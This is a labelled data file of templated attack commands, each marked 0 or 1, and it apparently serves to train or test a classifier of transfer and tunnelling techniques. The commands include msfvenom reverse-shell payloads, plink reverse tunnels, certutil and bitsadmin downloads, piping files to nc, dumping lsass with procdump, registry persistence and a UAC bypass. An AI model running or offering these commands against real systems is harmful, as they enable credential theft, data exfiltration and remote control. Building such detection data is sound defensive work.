1	curl ${source_file_path} -o $ ${destination_file_path}
1	cmd.exe /c "curl ${source_file_path} -o $ ${destination_file_path}"
1	powershell -c "curl ${source_file_path} -o $ ${destination_file_path}"
1	rsync -r ${source_directory} ${username}@${ip_address}:${destination_directory}
1	rsync -r ${username}@${ip_address}:${source_directory} ${destination_directory}
1	scp ${source_file_path} ${username}@${ip_address}:${destination_file_path}
1	scp ${username}@${ip_address}:${source_file_path} ${destination_file_path}
1	sftp ${username}@${ip_address}:${destination_file_path} <<< $"put ${source_file_path}"
1	sftp  ${username}@${ip_address}:${source_file_path} ${destination_file_path}
1	cmd /c "certutil -urlcache -split -f ${source_file_path} ${destination_file_path}"
1	msfvenom -p windows/meterpreter/reverse_https LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
1	msfvenom -p windows/meterpreter/reverse_http LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
1	plink.exe -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}
1	echo y | plink.exe ${username}@${ip_address} -pw ${password} -2 -4 -T -N -C -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}
1	powershell -c "echo y | plink.exe ${username}@${ip_address} -pw ${password} -2 -4 -T -N -C -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}"
1	powershell -c "plink.exe -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}"
1	cmd.exe /c "echo y | plink.exe ${username}@${ip_address} -pw ${password} -2 -4 -T -N -C -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}"
1	cmd.exe /c "plink.exe -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}"
1	plink.exe ${username}@${ip_address} -pw ${password} -2 -4 -T -N -C -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}
1	powershell -c "plink.exe ${username}@${ip_address} -pw ${password} -2 -4 -T -N -C -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}"
1	cmd.exe /c "plink.exe ${username}@${ip_address} -pw ${password} -2 -4 -T -N -C -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}"
1	wget https://${ip_address}/${destination_file_path}
1	bitsadmin.exe /transfer download /Priority HIGH ${source_file_path} ${destination_file_path}
1	cmd.exe /c "bitsadmin.exe /transfer download /Priority HIGH ${source_file_path} ${destination_file_path}"
1	powershell -c "bitsadmin.exe /transfer download /Priority HIGH ${source_file_path} ${destination_file_path}"
1	msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
1	msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	choco install putty
0	compress ${source_file_path}
0	powershell -c "mstsc /v:${ip_address} /f"
0	red add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /V "Atomic Red Team" /t REG_SZ /f /d "${command_to_execute}"
0	whoami /all
0	msfvenom -p linux/x64/shell_reverse_tcp LHOST=${ip_address} LPORT=${port} -f elf -o reverse.elf
0	cat ${source_file_path} | telnet ${ip_address} ${port}
0	cat ${source_file_path} | nc ${ip_address} ${port}
0	choco install -y putty
0	procdump -ma lsass.exe lsassdump.dmp
0	reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ${value_name} /t REG_DWORD /f /d ${value}
0	[System.Environment]::UserName
0	(gwmi -list win32_shadowcopy).Create("C:","ClientAccessible")
0	powershell -c "mstsc /v:${ip_address} /f"
0	Start-Process -FilePath ${parent_path} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath ${file_path} -CommandLine "${command_to_execute}"
0	New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force; Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "${command_to_execute}" -Force
0	powershell -c "gpg.exe -c ${source_file_path}"
0	tar -cvzf archive.tar.gz ${source_directory}
0	echo ${email_content} | mail -s ${email_subject} ${username}@${domain}
0	cmd.exe /c "cipher.exe /w:C:"
0	Copy-Item "${local_file_path}" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\"
0	robocopy ${source_file_path} ${destination_file_path} /mir
0	7z a archive.zip ${source_file_path}
0	reg add hkcu\software\classes\mscfile\shell\open\command /ve /d "${command_to_execute}" /f
0	rundll32.exe ${dll_file},${entry_point}
0	reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ${value_name} /t REG_DWORD /f /d ${value}
0	psexec \\${ip_address} -i -u ${username} -p ${password} ${command_to_execute}
